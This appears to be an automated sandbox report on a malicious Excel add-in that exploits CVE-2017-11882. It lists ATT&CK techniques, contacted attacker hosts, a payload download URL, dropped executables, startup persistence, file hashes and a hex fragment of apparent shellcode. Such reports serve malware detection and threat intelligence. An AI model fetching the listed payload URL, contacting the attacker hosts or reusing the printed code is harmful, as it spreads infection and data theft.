Credentials	Domains	Default Accounts	3 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	1 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	2 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	2 Valid Accounts	1 DLL Side-Loading	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	221 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Bypass User Account Control	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	3 Masquerading	Cached Domain Credentials	12 Security Software Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	422 Process Injection	2 Valid Accounts	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
202404294766578200.xlam.xlsx	68%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
202404294766578200.xlam.xlsx	51%	Virustotal		Browse
202404294766578200.xlam.xlsx	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\YED.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
yuahdgbceja.sytes.net	1%	Virustotal		Browse
geoplugin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.imvu.comr	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://www.ebuddy.com	0%	URL Reputation	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://b.scorecardresearch.com/beacon.js	0%	Avira URL Cloud	safe
http://23.94.54.101/GVV.exe	100%	Avira URL Cloud	malware
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	Avira URL Cloud	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	Virustotal		Browse
yuahdgbceja.sytes.net	0%	Avira URL Cloud	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Virustotal		Browse
http://b.scorecardresearch.com/beacon.js	0%	Virustotal		Browse
yuahdgbceja.sytes.net	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
yuahdgbceja.sytes.net	23.94.53.100	true	true	1%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	true	4%, Virustotal, Browse	unknown
www.google.com	172.217.1.4	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
http://23.94.54.101/GVV.exe	true	Avira URL Cloud: malware	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.google.com/chrome/whats-new/m109?internal=true	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/async/newtab_promos	false		high
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
yuahdgbceja.sytes.net	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhvA8BE.tmp.20.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
http://acdn.adnxs.com/ast/ast.js	bhvA8BE.tmp.20.dr	false		high
http://www.imvu.comr	svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	chp8DDF.tmp.20.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhvA8BE.tmp.20.dr	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhvA8BE.tmp.20.dr	false		high
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhvA8BE.tmp.20.dr	false		high
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhvA8BE.tmp.20.dr	false		high
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhvA8BE.tmp.20.dr	false		high
http://www.nirsoft.net	svchost.exe, 00000014.00000002.778795762.00000000001E3000.00000004.00000010.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvA8BE.tmp.20.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhvA8BE.tmp.20.dr	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cache.btrll.com/default/Pix-1x1.gif	bhvA8BE.tmp.20.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhvA8BE.tmp.20.dr	false		high
https://www.google.com	svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	Bactris.exe, 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://o.aolcdn.com/ads/adswrappermsni.js	bhvA8BE.tmp.20.dr	false		high
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhvA8BE.tmp.20.dr	false		high
http://www.msn.com/?ocid=iehp	bhvA8BE.tmp.20.dr	false		high
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhvA8BE.tmp.20.dr	false		high
http://static.chartbeat.com/js/chartbeat.js	bhvA8BE.tmp.20.dr	false		high
http://www.msn.com/de-de/?ocid=iehp	bhvA8BE.tmp.20.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhvA8BE.tmp.20.dr	false		high
http://www.nirsoft.net/	svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhvA8BE.tmp.20.dr	false		high
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhvA8BE.tmp.20.dr	false		high
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhvA8BE.tmp.20.dr	false		high
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhvA8BE.tmp.20.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhvA8BE.tmp.20.dr	false		high
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhvA8BE.tmp.20.dr	false		high
https://www.ccleaner.com/go/app_cc_pro_trialkey	bhvA8BE.tmp.20.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
https://contextual.media.net/8/nrrV73987.js	bhvA8BE.tmp.20.dr	false		high
http://www.imvu.com	svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chp8DDF.tmp.20.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
https://contextual.media.net/	bhvA8BE.tmp.20.dr	false		high
https://www.ecosia.org/newtab/	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhvA8BE.tmp.20.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhvA8BE.tmp.20.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
http://www.msn.com/	bhvA8BE.tmp.20.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhvA8BE.tmp.20.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	chp8DDF.tmp.20.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	false		high
http://www.imvu.com/T	svchost.exe, 00000016.00000002.769567756.000000000014C000.00000004.00000010.00020000.00000000.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhvA8BE.tmp.20.dr	false		high
http://cdn.at.atwola.com/_media/uac/msn.html	bhvA8BE.tmp.20.dr	false		high
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhvA8BE.tmp.20.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chp8DDF.tmp.20.dr	false		high
https://policies.yahoo.com/w3c/p3p.xml	bhvA8BE.tmp.20.dr	false		high
http://www.msn.com/advertisement.ad.js	bhvA8BE.tmp.20.dr	false		high
http://www.ebuddy.com	svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.94.54.101	unknown	United States	36352	AS-COLOCROSSINGUS	true
23.94.53.100	yuahdgbceja.sytes.net	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	true
172.217.1.4	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.22
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435094
Start date and time:	2024-05-02 04:53:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	4
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	202404294766578200.xlam.xlsx
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLSX@35/20@6/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 98 Number of non-executed functions: 257
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 19162.1529447935 for current running targets taking high CPU consumption Override analysis time to 38324.3058895871 for current running targets taking high CPU consumption Override analysis time to 76648.6117791742 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.33.163, 142.251.32.78, 172.253.63.84, 34.104.35.123, 142.251.41.35
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:54:51	API Interceptor	227x Sleep call for process: EQNEDT32.EXE modified
04:57:09	API Interceptor	57x Sleep call for process: svchost.exe modified
19:57:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	7sYKxZWLgw.exe	Get hash	malicious	PureLog Stealer	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse
	https://ipgnz-my.sharepoint.com/:b:/p/dennis/EQBdT3T6DAtNud_AgeVvevoBe4Wv-zzpt7vOYoJkOhRHCQ?e=4%3ao8ZtZs&at=9&xsdata=MDV8MDJ8bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXV8ZWQ1OTE1MzNhZDY4NDYyZGVhMzEwOGRjNjk4OGRiNjR8YTRlYmRjZDY2ODU0NGRlMGIxOGM3MmQ2ZjA5ZDA1MzV8MHwwfDYzODUwMTI4NDE4MTIzMzI1MXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18ODAwMDB8fHw%3d&sdata=Zjh2Q283ajAyWEprbjBOUFdSdEFmRDhIdUU4Ym01c0JKNzV6cU1BWklhST0%3d	Get hash	malicious	HTMLPhisher	Browse
	Signature requested-Fiona QR.png	Get hash	malicious	HTMLPhisher	Browse
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse
23.94.54.101	attachment.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/EPQ.exe
23.94.54.101	NI-45733-D.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/ESS.exe
178.237.33.50	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	bYPQHxUNMF.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	doc.bat	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	New Order.xla.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO-TKT-RFQ#24_4_30.com.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	AWBSHIPPING-DHL-46T6R9764987.vbs	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	bYPQHxUNMF.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	doc.bat	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	New Order.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-TKT-RFQ#24_4_30.com.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWBSHIPPING-DHL-46T6R9764987.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	OWrVfOdM62.rtf	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.3.239.4
	ET2431000075 & ET2431000076.xls	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.3.239.4
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	107.172.31.6
	SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elf	Get hash	malicious	Gafgyt, Mirai	Browse	23.94.151.97
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	attachment.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.243.154
	cotizaci#U00f3n_04302024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtf	Get hash	malicious	Unknown	Browse	107.175.242.96
AS-COLOCROSSINGUS	OWrVfOdM62.rtf	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.3.239.4
	ET2431000075 & ET2431000076.xls	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.3.239.4
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	107.172.31.6
	SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elf	Get hash	malicious	Gafgyt, Mirai	Browse	23.94.151.97
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	attachment.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.243.154
	cotizaci#U00f3n_04302024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtf	Get hash	malicious	Unknown	Browse	107.175.242.96
ATOM86-ASATOM86NL	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff	Get hash	malicious	Remcos	Browse	178.237.33.50
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	bYPQHxUNMF.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	doc.bat	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	New Order.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-TKT-RFQ#24_4_30.com.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWBSHIPPING-DHL-46T6R9764987.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.02359004946268
Encrypted:	false
SSDEEP:	12:tkhXkmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	A82488501536043ACF922C4D91246D09
SHA1:	BCA9EF44B47567D62A94F2ED6A79491575544D06
SHA-256:	47F1D58A3F31240D1EAE84F8585B4AFFA9ECE1EDF5FFB39631431954E1B39D5E
SHA-512:	30F80522E14B7AC59FB4D260D8C36A3FB88CCF29B7E279F34A493F94B59CF1EC0951205E33A1E81631AD8C682CF8831BC185E224A43A87BB52CB0C0D7080DB50
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\Charley

Download File

Process:	C:\Users\user\AppData\Roaming\YED.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.5495038822751415
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbRE+IBg84vfF3if6gy9S:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RM
MD5:	5846F7B7E4DA4C2A6F65EDBD30207C9D
SHA1:	8A3B8A8FCD130DE14FB8926C895D544B19A67AD3
SHA-256:	38C9E99D2366B4AE38F5CE39B443FA92D046077296035BAA5941C99C733632FD
SHA-512:	524C4A37B011F479B287597726740ACD58FCF8517EBF497EB62B5A0B09F7FA8910FB71AF379646B815AE493D2B908A840B1D9CE0DBDC0717BE2010471EED937F
Malicious:	false
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\aut8862.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\YED.exe
File Type:	data
Category:	dropped
Size (bytes):	407084
Entropy (8bit):	7.892991458916071
Encrypted:	false
SSDEEP:	12288:5Y7/epA+GWjJxDpsHIkSBBWR6tna1bEX+9j9BR2EMh2:5qRhPR6OEX8j9/2EA2
MD5:	5816FD286AFCB30B981CA55E867A40BF
SHA1:	BA87750C26842B802EDEFEB86802D42DBF6C21E6
SHA-256:	1DA09B783C94CA10A320CC6B9ADBD0E879982105ACEB6AFAD1F03245C7B7B809
SHA-512:	8CEF41F0FEFB22C3DA77C998074ED28044848B8A70C311B50A222EFFA493FF71F8B860263554372F9EADD48727F97FD0EFF8152348E11EB1304837C9B534820B
